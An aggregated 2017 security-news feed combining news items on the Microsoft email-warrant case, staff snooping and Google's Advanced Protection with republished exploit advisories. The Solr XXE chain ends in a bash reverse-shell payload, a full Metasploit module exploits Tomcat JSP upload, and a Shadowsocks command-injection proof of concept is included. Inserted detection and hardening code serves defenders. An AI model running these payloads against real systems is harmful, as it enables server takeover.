CVE-2015-7806

http://ift.tt/2ywHfwZ

Security News

via National Vulnerability Database http://ift.tt/OD63ZH

October 17, 2017 at 02:24PM

Supreme Court Will Hear U.S Vs Microsoft Privacy Case

http://ift.tt/2yrrJ3n

World Will Watch the U.S. Government Vs Microsoft Played Out in the Supreme Court

The continuing battle between the U.S. government and Microsoft over access to private emails stored in Ireland is going to the Supreme Court. The case was accepted by the Supreme Court on Monday.

It began in 2013 when the government served a search warrant on Microsoft, seeking emails it believed would help in the prosecution of a drugs-trafficking case. Microsoft handed over relevant information stored in America, but declined to deliver emails stored in Ireland. It argued overreach, claiming that a search warrant could only apply within U.S. borders.

The government went to court to force Microsoft to comply. At first its warrant was upheld, but Microsoft appealed and the U.S. Court of Appeals for the 2nd Circuit subsequently overturned the ruling.

The basic arguments are relatively simple. The government contends that an inability to access evidence pertaining to U.S. means that “hundreds if not thousands of investigations of crimes — ranging from terrorism, to child pornography, to fraud — are being or will be hampered by the government’s inability to obtain electronic evidence.” It holds that the warrant is valid because the actual search would be conducted in the U.S.

Microsoft contends that the relevant law, the Stored Communications Act of 1986, was written in an age that had no concept of private emails being stored in different locations across the globe. But it also claims there are wider issues to consider. “If U.S. law enforcement can obtain the emails of foreigners stored outside the United States,” wrote Microsoft’s president and chief legal officer Brad Smith in a blog post yesterday (http://ift.tt/2x3u5Ek…), “what’s to stop the government of another country from getting your emails even though they are located in the United States?”

The current laws were written for the era of the floppy disk, he added, “not the world of the cloud. We believe that rather than arguing over an old law in court, it is time for Congress to act by passing new legislation, such as the International Communications Privacy Act (ICPA) of 2017.”

Writing in the Volokh Conspiracy blog yesterday (http://ift.tt/2x3nFF0…), George Washington University law professor Orin Kerr points out that it is unusual for the Supreme Court to hear a case without a lower court split. “It’s typical for the justices to wait for lower courts to divide on an issue before they will step in,” he wrote. “Relying on splits uses lower-court disagreement as a signal for the kind of difficult and important issues that the justices need to resolve.” It is, he suggests, “a recognition among the justices of the tremendous importance of digital evidence collection. Whatever the right answers are, the justices need to provide them.”

While the drama is being played out on the U.S. legal stage, it is being watched closely around the world — and no more so than in Europe. Europe has a different attitude towards privacy than the U.S., typified first in the European Data Privacy Directive, and now in the European General Data Protection Regulation (GDPR, http://ift.tt/2xz40jX). Both require that European personal data should not be exported to a location with lower privacy protections than in Europe. The U.S. is considered one such location.

To get round this potential impasse, Europe and the U.S. developed a Safe Harbor arrangement to allow American companies to export European data to servers in America; but this was thrown out (http://ift.tt/2x2Z1V8…) by the European Court of Justice (the EU’s equivalent to the Supreme Court) in September 2015. The primary reason was unfettered access to personal data by the U.S. government.

Since then the two governments have developed Privacy Shield as a stronger replacement for Safe Harbor — but Privacy Shield (http://ift.tt/2x2gJbp…) has not yet been tested in the courts. Europe’s reaction to the US government’s potential ability to unilaterally extract European data from within Europe will test Privacy Shield to the limits.

“In a keenly watched case,” summarizes Robert Cattanach, a partner at the international law firm Dorsey & Whitney, “the US Supreme Court has agreed to review a decision by the Second Circuit Court of Appeals that Microsoft did not have to turn over user data stored overseas in response to a search warrant issued under the Stored Communication Act. The case pits the interests of law enforcement access to information against concerns over government overreach, and could have ramifications globally as other nations likely will adapt their policies regarding access to information stored in other countries based on what the US Supreme Court decides. Privacy advocates have decried the prospect of borderless search authority by governments across the world, while law enforcement have painted the specter of criminal activities being shielded by convenient placement of data. All of this is being played out as the European Union continues its review of the Privacy Shield measure that allows the transfer of personal data of EU residents to the US under the presumption that it can be adequately protected.”

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.

Security News

via SecurityWeek RSS Feed http://ift.tt/T5XpCH

October 17, 2017 at 02:17PM

Security Pros Admit Snooping on Corporate Network: Survey

http://ift.tt/2yup60G

IT security professionals, particularly executives, often access information that is not relevant to their day-to-day work, according to a new One Identity study focusing on “snooping” on the corporate network.

Dimensional Research polled more than 900 IT security professionals on behalf of One Identity. The respondents were from various types of companies in the United States, the United Kingdom, Germany, France, Australia, Singapore and Hong Kong, with at least 500 employees.

When asked if their company’s employees ever attempt to access information that is not necessary for their day-to-day work, 92% admitted it happens and 23% said it happens frequently. There are no major differences based on region or the size of the company.

Roughly two-thirds of the IT security pros that took part in the survey admitted snooping themselves, although 51% claim they do it rarely. Professionals from the U.S. seem to snoop the least (50%) while ones in Germany snoop the most (80%).

Interestingly, executives appear to be the guiltiest (71% said they snoop), followed by managers (68%) and other members of the IT security team (56%).

Globally, one in three IT security professionals who took part in the survey said they had accessed sensitive information about their company’s performance, despite not being required to do so as part of their job. This behavior can be seen more in Europe and Asia, and less in the U.S. and Australia, the report shows.

Again, executives and managers are more likely to look at company performance data compared to non-managers.

[Figure: Snooping based on company size and job role]

The survey also found that cybersecurity professionals working in the technology sector are most likely to look for data on their organization’s performance.

“While insider threats tend to be non-malicious in intent, our research depicts a widespread, intrusive meddling from employees when it comes to information that falls outside their responsibility — and it could be that meddling that ends up putting their employers in hot water,” explained John Milburn, president and general manager of One Identity.

“Without proper governance of access permissions and rights, organizations give employees free reign to move about the enterprise and access sensitive information like financial performance data, confidential customer documentation, or a CEO’s personal files. If that information winds up in the wrong hands, corporate data loss, customer data exposure or compliance violations are possible risks that could result in irreversible damage to the business’s reputation or financial standing,” Milburn added.

Eduard Kovacs is an international correspondent for SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Security News

via SecurityWeek RSS Feed http://ift.tt/T5XpCH

October 17, 2017 at 02:17PM

Google Advanced Protection Program protects high-risk users from hacks

http://ift.tt/2kW81Kd

Instead of focusing on all users, Google set its sights on the minority who need the strongest security measures and today announced the launch of its Advanced Protection Program. The program goes beyond two-step verification by requiring a physical piece of hardware as a key to access your Gmail and other Google accounts; those who enroll will be trading convenience for added security.

Google rolled out the new security measure for the minority of its users who are at an elevated risk of cyberattack. In the company’s words:

We took this unusual step because there is an overlooked minority of our users that are at particularly high risk of targeted online attacks. For example, these might be campaign staffers preparing for an upcoming election, journalists who need to protect the confidentiality of their sources, or people in abusive relationships seeking safety. Sometimes even the most careful and security-minded users are successfully attacked through phishing scams, especially if those phishing scams were individually targeted at the user in question.

If you have a personal Google Account, you can enroll using Chrome — and only Chrome, at least for now, as it supports the U2F standard and has done so since 2014. After enrolling, Google promises to “always use the strongest defenses that Google has to offer” and to “continually update” those security measures.

How to use Google Advanced Protection

To use Google Advanced Protection, you will need two Universal 2nd Factor (U2F) security keys, which have been approved by the FIDO Alliance. That means you will need a U2F USB key for your computer and one that can authenticate over Bluetooth for your mobile devices — phone, tablet and laptop. For example, Google suggests purchasing a Yubico FIDO U2F security key and a Feitian MultiPass FIDO security key. Once you have two U2F keys approved by the FIDO Alliance, you can turn on Advanced Protection.

Once Advanced Protection is on, your Google life will change. 2FA verification codes sent to your phone and the Google Authenticator app will no longer grant access to your account. If you accidentally fall for a phishing scam and enter your password, the attacker or social engineer can’t get into your account without the U2F keys.

If an attacker tries impersonation and uses the “forgot password” route, there are added steps for an Advanced Protection user to verify his or her identity. Google doesn’t specify what those extra steps will be other than “additional reviews and requests for more details about why you’ve lost access to your account.”

Furthermore, “if you ever lose access to your account and both of your Security Keys, these added verification requirements will take a few days to restore access to your account.”

Additionally, to prevent third-party malicious apps from gaining access to your account, Google will automatically limit access to your Gmail and Drive to specific apps — especially its own for now. If you want to access your Gmail, then you have to use Chrome or the Gmail app. You will also have to use Chrome if you want to access your Photos or other signed-in Google services.

Personalized Google Security Checkup

To celebrate Cybersecurity Awareness Month, Google said it intends to launch a series of security announcements this week.

Yesterday, Google announced the launch of its revamped Security Checkup, which provides “personalized guidance to help you improve the security of your account.” Hopefully, you will see a green check mark next to each item in the list. If not, then you need to take care of the items marked with yellow or red exclamation points. The new and improved Security Checkup will evolve as new threats arise.

Google is also testing new predictive phishing protections in Chrome. If you input your Google password into a suspected phishing site, you might see a warning that states something like this: “This site may have just stolen your password.”

The company added, “We plan to expand predictive phishing protection to all other passwords you’ve saved in Chrome’s password manager, and [we plan to] enable other apps and browsers that use Safe Browsing technology, like Safari, Firefox and Snapchat, to use it as well.”

Security News

via CSO Online http://ift.tt/2gDzvif

October 17, 2017 at 02:10PM

[webapps] Apache Solr 7.0.1 – XML External Entity Expansion / Remote Code Execution

http://ift.tt/2xMSpie

First Vulnerability: XML External Entity Expansion (deftype=xmlparser) 

Lucene includes a query parser that is able to create the full spectrum of Lucene queries, using an XML data structure. Starting from version 5.1, Solr supports the "xml" query parser in the search query.

The problem is that the Lucene XML parser does not explicitly prohibit DOCTYPE declarations and expansion of external entities. It is possible to include special entities in the XML document that point to external files (via file://) or external URLs (via http://):

Example usage: http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://ift.tt/2yx8kQU"'><a></a>'}

When Solr is parsing this request, it makes an HTTP request to http://ift.tt/2yx8kQU and treats its content as the DOCTYPE definition.

Because the parser type can be defined in the search query, which very often comes from untrusted user input (e.g. search fields on websites), an external attacker can make arbitrary HTTP requests to the local Solr instance and bypass all firewall restrictions.

For example, this vulnerability could be used to send malicious data to the '/upload' handler:

http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://ift.tt/2yxzmaP{"xx":"yy"}&commit=true"'><a></a>'}

This vulnerability can also be exploited as Blind XXE using the ftp wrapper in order to read arbitrary local files from the Solr server.

Vulnerable code location:
/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java

static Document parseXML(InputStream pXmlFile) throws ParserException {
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    DocumentBuilder db = null;
    try {
      db = dbf.newDocumentBuilder();
    }
    catch (Exception se) {
      throw new ParserException("XML Parser configuration error", se);
    }
    org.w3c.dom.Document doc = null;
    try {
      doc = db.parse(pXmlFile);
    }
  

Steps to reproduce:

1. Set up a listener on any port by using netcat command "nc -lv 4444"
2. Open http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:4444/executed"><a></a>'}
3. You will see a request from the Solr server on your netcat listener. It proves that the DOCTYPE declaration is resolved.


Remediation suggestions:

Consider adding the following lines to /solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java:

static Document parseXML(InputStream pXmlFile) throws ParserException {
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    DocumentBuilder db = null;
    try {
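      // protect from XXE attacks
      // reject any document that carries a DOCTYPE declaration
      dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
      // do not resolve external general entities
      dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
      // do not resolve external parameter entities
      dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);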
      
      db = dbf.newDocumentBuilder();
    }
    catch (Exception se) {
      throw new ParserException("XML Parser configuration error", se);
    }
    org.w3c.dom.Document doc = null;
    try {
      doc = db.parse(pXmlFile);
    }
  
Links:
http://ift.tt/Z2O0zd
http://ift.tt/1XxbpDk

CVSS v2 base score: 9.0
(AV:N/AC:L/Au:N/C:C/I:P/A:P)

Second Vulnerability: Remote Code Execution (add-listener: RunExecutableListener)

The Solr "RunExecutableListener" class can be used to execute arbitrary commands on specific events, for example after each update query. The problem is that such a listener can be enabled with any parameters just by using the Config API with the add-listener command.

POST /solr/newcollection/config HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json  
Content-Length: 198

{
  "add-listener" : {
    "event":"postCommit",
    "name":"newlistener",
    "class":"solr.RunExecutableListener",
    "exe":"ANYCOMMAND",
    "dir":"/usr/bin/",
    "args":["ANYARGS"]
  }
}

Parameters "exe", "args" and "dir" can be crafted through the HTTP request during modification of the collection's config. This means that anybody who can send an HTTP request to the Solr API is able to execute arbitrary shell commands when the "postCommit" event is fired. This leads to arbitrary code execution by a remote attacker.

Steps to reproduce:

Step 1. Create a new collection:

http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2

Step 2. Set up a listener on any port by using netcat command "nc -lv 4444"

Step 3. Add a new RunExecutableListener listener for the collection, where the "exe" attribute contains the name of the command to run ("/usr/bin/curl") and the "args" attribute contains the "http://localhost:4444/executed" value, to make a request to the attacker's netcat listener:

POST /solr/newcollection/config HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json  
Content-Length: 198

{
  "add-listener" : {
    "event":"postCommit",
    "name":"newlistener",
    "class":"solr.RunExecutableListener",
    "exe":"curl",
    "dir":"/usr/bin/",
    "args":["http://localhost:4444/executed"]
  }
}

Step 4. Update "newcollection" to trigger execution of RunExecutableListener: 

POST /solr/newcollection/update HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json  
Content-Length: 19

[{"id":"test"}]

Step 5. You will see a request from the Solr server on your netcat listener. It proves that the curl command is executed on the server.


CVSS v2 base score: 10.0
(AV:N/AC:L/Au:N/C:C/I:C/A:C)

Summary:

By chaining these two vulnerabilities, an external attacker can achieve remote code execution even without direct access to the Solr server. The only requirement is that the attacker be able to specify part of the query that reaches the "q" search parameter (which is the case for many web applications that use Solr).

Let's say that we have an attacker who can only send search queries ("q" param) to a "/select" Solr endpoint.
Here is the complete exploit scenario:

Step 1. Create New collection via XXE. This step may be skipped if the attacker already knows any collection name.

http://localhost:8983/solr/gettingstarted/select?q=%20%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%61%64%6d%69%6e%2f%63%6f%6c%6c%65%63%74%69%6f%6e%73%3f%61%63%74%69%6f%6e%3d%43%52%45%41%54%45%26%6e%61%6d%65%3d%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%26%6e%75%6d%53%68%61%72%64%73%3d%32%22%3e%3c%61%3e%3c%2f%61%3e%27%7d%20

Without URL encode:

http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2"><a></a>'}

Step 2. Set up a netcat listener "nc -lv 4444"

Step 3. Add a new RunExecutableListener listener via XXE

Without URL encode:

http://localhost:8983/solr/newcollection/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/newcollection/select?q=xxx&qt=/solr/newcollection/config?stream.body={"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c","$@|sh",".","echo","/bin/bash","-i",">&","/dev/tcp/127.0.0.1/1234","0>&1"]}}&shards=localhost:8983/"><a></a>'}

As you may notice, updating the config requires sending a POST request to the application, but the XXE vulnerability only lets us send HTTP GET requests. A special trick is used here: if Solr receives a "/select?q=123&qt=/xxx&shards=localhost:8983/" GET request, it actually converts it to POST and redirects the request to the shard specified in the "shards" parameter. It also overwrites the URL query with the "qt" parameter, so we can convert it from "/select" to "/config".
The resulting HTTP request that lands on localhost:8983/ will be a POST request with stream.body="our_value". That is exactly what we need in terms of exploitation.

Step 4. Update "newcollection" through XXE to trigger execution of RunExecutableListener

http://localhost:8983/solr/newcollection/select?q=%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%75%70%64%61%74%65%3f%73%74%72%65%61%6d%2e%62%6f%64%79%3d%25%35%62%25%37%62%25%32%32%25%36%39%25%36%34%25%32%32%25%33%61%25%32%32%25%34%31%25%34%31%25%34%31%25%32%32%25%37%64%25%35%64%26%63%6f%6d%6d%69%74%3d%74%72%75%65%26%6f%76%65%72%77%72%69%74%65%3d%74%72%75%65%22%3e%3c%61%3e%3c%2f%61%3e%27%7d%20

Without URL encode:

http://localhost:8983/solr/newcollection/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/newcollection/update?stream.body=[{"id":"AAA"}]&commit=true&overwrite=true"><a></a>'} 

Step 5. When the "/bin/sh c $@|sh . echo /bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&1" command is executed during update, a new shell session will be opened on the netcat listener. An attacker can execute any shell command on the server where Solr is running.


In all three requests Solr responds with different errors, but all of these errors occur after the desired actions have been executed.

All these vulnerabilities were tested on the latest version of Apache Solr with the default cloud config (bin/solr start -e cloud -noprompt)

These vulnerabilities were discovered by:
Michael Stepankin (JPMorgan Chase)
Olga Barinova (Gotham Digital Science)
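
For defenders, the three request patterns this advisory describes (the xml query parser with a DOCTYPE, a Config API add-listener for RunExecutableListener, and the qt/shards GET-to-POST rewrite) can be looked for in proxy or access logs. The following is an added example, not code from the advisory or from Solr; the function names, rule names and the sample requests (built from the advisory's own placeholder values) are assumptions made for illustration.

```python
import json
import re
from urllib.parse import quote, unquote

# The chained requests in the advisory nest several layers of percent-encoding,
# so decoding once is not enough; the bound keeps the loop finite.
MAX_DECODE_ROUNDS = 5


def fully_decode(text):
    """Percent-decode repeatedly (bounded) so nested encoding cannot hide a pattern."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def findings(method, target, body=""):
    """Return the names of the advisory's patterns present in one HTTP request."""
    blob = fully_decode(target + "\n" + body).lower()
    query = blob.partition("?")[2]
    hits = []
    # XXE: xml query parser selected by the client together with a DOCTYPE declaration.
    if "xmlparser" in blob and "<!doctype" in blob:
        hits.append("xxe-xmlparser-doctype")
    # RCE: Config API add-listener that registers solr.RunExecutableListener.
    if "add-listener" in blob and "runexecutablelistener" in blob:
        hits.append("config-runexecutablelistener")
    # GET-to-POST trick: "qt" set to a handler path in the same request as "shards".
    if re.search(r"(^|[?&])qt=/", query) and re.search(r"(^|[?&])shards=", query):
        hits.append("qt-shards-rewrite")
    return hits


def scan(requests):
    """Return (index, hits) for every request that matched at least one pattern."""
    results = []
    for index, (method, target, body) in enumerate(requests):
        hits = findings(method, target, body)
        if hits:
            results.append((index, hits))
    return results


# Constructed sample input. The probe and the listener body reuse the advisory's
# own placeholder values (localhost:4444, ANYCOMMAND, ANYARGS).
XXE_PROBE = "{!xmlparser v='<!DOCTYPE a SYSTEM \"http://localhost:4444/executed\"><a></a>'}"
LISTENER_BODY = json.dumps({
    "add-listener": {
        "event": "postCommit",
        "name": "newlistener",
        "class": "solr.RunExecutableListener",
        "exe": "ANYCOMMAND",
        "dir": "/usr/bin/",
        "args": ["ANYARGS"],
    }
})
SAMPLE_REQUESTS = [
    ("GET", "/solr/gettingstarted/select?q=laptop&rows=10", ""),
    # Double percent-encoded, as a client trying to slip past a single decode would send it.
    ("GET", "/solr/gettingstarted/select?q=" + quote(quote(XXE_PROBE, safe=""), safe=""), ""),
    ("POST", "/solr/newcollection/config", LISTENER_BODY),
    ("GET", "/solr/newcollection/select?q=123&qt=/xxx&shards=localhost:8983/", ""),
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_REQUESTS):
        method, target, _ = SAMPLE_REQUESTS[index]
        print(method, target[:70], "->", ", ".join(hits))
```

Matching is deliberately broad: a hit means the request should be reviewed, not that exploitation succeeded.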

Security News

via Exploit-DB Updates http://ift.tt/1HHo1m3

October 17, 2017 at 02:08PM

[remote] Tomcat – Remote Code Execution via JSP Upload Bypass (Metasploit)

http://ift.tt/2kWDPOR

##
# This module requires Metasploit: http://ift.tt/1bnzWGZ
# Current source: http://ift.tt/1iQz0Mp
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Tomcat RCE via JSP Upload Bypass',
      'Description'    => %q{
        This module uploads a jsp payload and executes it.
      },
      'Author'      => 'peewpw',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2017-12617' ],
          [ 'URL', 'http://ift.tt/2xkGJhn' ],
          [ 'URL', 'http://ift.tt/2yd6eSv' ]
        ],
      'Privileged'     => false,
      'Platform'    => %w{ linux win }, # others?
      'Targets'     =>
        [
          [ 'Automatic',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'win'
            }
          ],
          [ 'Java Windows',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'win'
            }
          ],
          [ 'Java Linux',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'linux'
            }
          ]
        ],
      'DisclosureDate' => 'Oct 03 2017',
      'DefaultTarget'  => 0))

    register_options([
        OptString.new('TARGETURI', [true, "The URI path of the Tomcat installation", "/"]),
        Opt::RPORT(8080)
      ])
  end

  def check
    testurl = Rex::Text::rand_text_alpha(10)
    testcontent = Rex::Text::rand_text_alpha(10)

    send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
      'method'    => 'PUT',
      'data'      => "<% out.println(\"#{testcontent}\");%>"
    })

    res1 = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, "#{testurl}.jsp"),
      'method'    => 'GET'
    })

    if res1 && res1.body.include?(testcontent)
      send_request_cgi(
        opts = {
          'uri'       => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
          'method'    => 'DELETE'
        },
        timeout = 1
      )
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Uploading payload...")
    testurl = Rex::Text::rand_text_alpha(10)

    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
      'method'    => 'PUT',
      'data'      => payload.encoded
    })
    if res && res.code == 201
      res1 = send_request_cgi({
        'uri'       => normalize_uri(target_uri.path, "#{testurl}.jsp"),
        'method'    => 'GET'
      })
      if res1 && res1.code == 200
        print_status("Payload executed!")
      else
        fail_with(Failure::PayloadFailed, "Failed to execute the payload")
      end
    else
      fail_with(Failure::UnexpectedReply, "Failed to upload the payload")
    end
  end

end

Security News

via Exploit-DB Updates http://ift.tt/1HHo1m3

October 17, 2017 at 02:08PM

[local] Shadowsocks – Log File Command Execution

http://ift.tt/2xNCpwi

X41 D-Sec GmbH Security Advisory: X41-2017-008

Multiple Vulnerabilities in Shadowsocks
=======================================

Overview
--------
Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A
Vendor: Shadowsocks
Vendor URL: http://ift.tt/1l5mEFl
Vector: Network
Credit: X41 D-Sec GmbH, Niklas Abel
Status: Public
Advisory-URL:
http://ift.tt/2g8fKiP


Summary and Impact
------------------
Several issues have been identified that allow attackers to manipulate
log files, execute commands and brute force Shadowsocks with the
autoban.py brute force detection enabled. Brute force detection from
autoban.py does not work with the suggested tail command. The key of
captured Shadowsocks traffic can be brute forced.


Product Description
-------------------
Shadowsocks is a fast tunnel proxy that helps you bypass firewalls.



Log file manipulation
=====================
Severity Rating: Medium
Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A
Vector: Network
CVE: not yet issued
CWE: 117
CVSS Score: 4.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Summary and Impact
------------------
Log file manipulation is possible with a manipulated hostname, sent to
the server from a client, even if Shadowsocks is as quiet as possible
with "-qq".

Therefore a string like "\nI could be any log entry\n" could be sent as
hostname to Shadowsocks. The server would log an additional line with
"I could be any log entry".


Workarounds
-----------
There is no workaround available; do not trust the logfiles until a
patch is released.
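
The fix class for this issue (CWE-117) is to neutralize control
characters in untrusted values before they reach the log formatter. The
following is an added example, not code from the advisory or from
Shadowsocks; the logger names and the "connecting %s:%d" message are
constructed for illustration.

```python
import io
import logging


def neutralize(value):
    """Escape control characters so one event stays on one physical log line."""
    if isinstance(value, bytes):
        value = value.decode("utf-8", "backslashreplace")
    return "".join(
        ch if ch.isprintable() else ch.encode("unicode_escape").decode("ascii")
        for ch in str(value)
    )


def _clean(value):
    # Only text-like arguments are rewritten; numbers keep their type for %d.
    return neutralize(value) if isinstance(value, (str, bytes)) else value


class NeutralizeArgs(logging.Filter):
    """Rewrites the arguments of every record before it is formatted.

    This covers values passed as logging arguments. Untrusted data that was
    already interpolated into the message template is not covered.
    """

    def filter(self, record):
        if isinstance(record.args, dict):
            record.args = {k: _clean(v) for k, v in record.args.items()}
        elif record.args:
            record.args = tuple(_clean(v) for v in record.args)
        return True


def logged_lines(hostname, safe):
    """Log one event for `hostname` and return the physical lines written."""
    stream = io.StringIO()
    logger = logging.getLogger("demo.safe" if safe else "demo.unsafe")
    logger.handlers, logger.filters = [], []
    logger.propagate = False
    logger.setLevel(logging.INFO)
    handler = logging.StreamHandler(stream)
    handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
    logger.addHandler(handler)
    if safe:
        logger.addFilter(NeutralizeArgs())
    logger.info("connecting %s:%d", hostname, 443)
    return stream.getvalue().splitlines()


if __name__ == "__main__":
    hostile = "\nI could be any log entry\n"  # string quoted in the advisory
    print(logged_lines(hostile, safe=False))
    print(logged_lines(hostile, safe=True))
```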



Command Execution
=================
Severity Rating: Critical
Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A
Vector: Network
CVE: not yet issued
CWE: 78
CVSS Score: 9.0
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H


Summary and Impact
------------------
When the brute force detection with autoban.py is enabled, remote
attackers are able to execute arbitrary commands.

Command execution is possible because of line 53 "os.system(cmd)"
in autoban.py, which executes "cmd = 'iptables -A INPUT -s %s -j DROP' %
ip". The "ip" parameter gets parsed from the log file, whose contents
can be controlled by a third party sending unauthenticated packets.


Proof of Concept
----------------
When a string like "can not parse header when ||ls&:\n" is sent as host
name to Shadowsocks, it would end up in the logfile and lead to the
execution of "ls".
Autoban.py does not execute commands with spaces due to internal
sanitization. A requested hostname like:

" can not parse header when ||ls&:\ntouch /etc/evil.txt\nexit\ncan not
parse header when ||/bin/bash</var/log/shadowsocks.log&:\n" could be
used to work around this limitation. It writes the command "touch
/etc/evil.txt" into the logfile and executes it with
"/bin/bash</var/log/shadowsocks.log".
The exit; command is an important factor; without it an unbounded
recursion would occur, leading to a DoS.


Workarounds
-----------
No workaround available, do not use autoban.py.
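
For anyone reviewing or replacing a log-driven ban script, the following
added example (not code from the advisory or from Shadowsocks) puts the
string-formatting pattern described above beside a hardened form that
validates the address and builds an argument vector instead of a shell
string. The "from IP:PORT" log layout, the token extraction in
unsafe_command() and the threshold of 3 are assumptions.

```python
import ipaddress
from collections import Counter

MARKER = "can not parse header when"  # marker string quoted in the advisory

# Constructed sample input. The "... from IP:PORT" layout is an assumption;
# the last entry carries the hostile string from the advisory's proof of concept.
SAMPLE_LOG = [
    "2017-10-13 10:00:01 ERROR can not parse header when handling connection from 203.0.113.7:51234",
    "2017-10-13 10:00:02 ERROR can not parse header when handling connection from 203.0.113.7:51240",
    "2017-10-13 10:00:03 ERROR can not parse header when handling connection from 203.0.113.7:51251",
    "2017-10-13 10:00:04 ERROR can not parse header when ||ls&:",
]


def unsafe_command(line):
    """Pattern the advisory describes: log text formatted into a shell string.

    Only builds the string so it can be inspected; nothing is executed.
    The token extraction is an assumption about how "ip" is parsed.
    """
    ip = line.split()[-1].split(":")[-2]
    return "iptables -A INPUT -s %s -j DROP" % ip


def parse_source_ip(line):
    """Return a validated address object, or None when the line cannot be trusted."""
    tokens = line.split()
    if MARKER not in line or not tokens:
        return None
    host, sep, port = tokens[-1].rpartition(":")
    if not sep or not port.isdigit():
        return None
    try:
        return ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return None


def ban_argv(addr):
    """Argument vector for subprocess.run(argv, check=True); no shell parses it."""
    tool = "ip6tables" if addr.version == 6 else "iptables"
    return [tool, "-A", "INPUT", "-s", str(addr), "-j", "DROP"]


def plan_bans(lines, threshold=3):
    """Count failures per validated address; emit one ban when the threshold is hit.

    threshold=3 is a hypothetical default for this example.
    """
    counts = Counter()
    plans = []
    for line in lines:
        addr = parse_source_ip(line)
        if addr is None:
            continue
        counts[addr] += 1
        if counts[addr] == threshold:
            plans.append(ban_argv(addr))
    return plans


if __name__ == "__main__":
    print(unsafe_command(SAMPLE_LOG[-1]))
    for argv in plan_bans(SAMPLE_LOG):
        print(argv)
```

Validation removes the shell injection only. Because log entries can be
forged (see "Log file manipulation"), ban decisions still rest on
untrusted input, which is consistent with the workaround above.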



Lack of Bruteforce detection through autoban.py
===============================================
Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A


Summary and Impact
------------------
The brute force detection autoban.py does not work at all with the tail
command suggested at
http://ift.tt/1BNqZ5q.

The command "python autoban.py < /var/log/shadowsocks.log" does work,
but the suggested "nohup tail -F /var/log/shadowsocks.log | python
autoban.py > log 2>log &" does not block IPs.
The "for line in sys.stdin:" from autoban.py parses the input until
there is an end of file (EOF). As "tail -F" will never pipe an EOF into
the Python script, the sys.stdin will block the script forever. So the
"tail -F /var/log/shadowsocks | autoban.py" will never block anything
except itself.

Workarounds
-----------
Use "python autoban.py < /var/log/shadowsocks.log" in a cronjob. Do not
use autoban.py until the command execution issue gets fixed.



Bruteforcable Shadowsocks traffic because of MD5
================================================
Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A

Summary and Impact
------------------
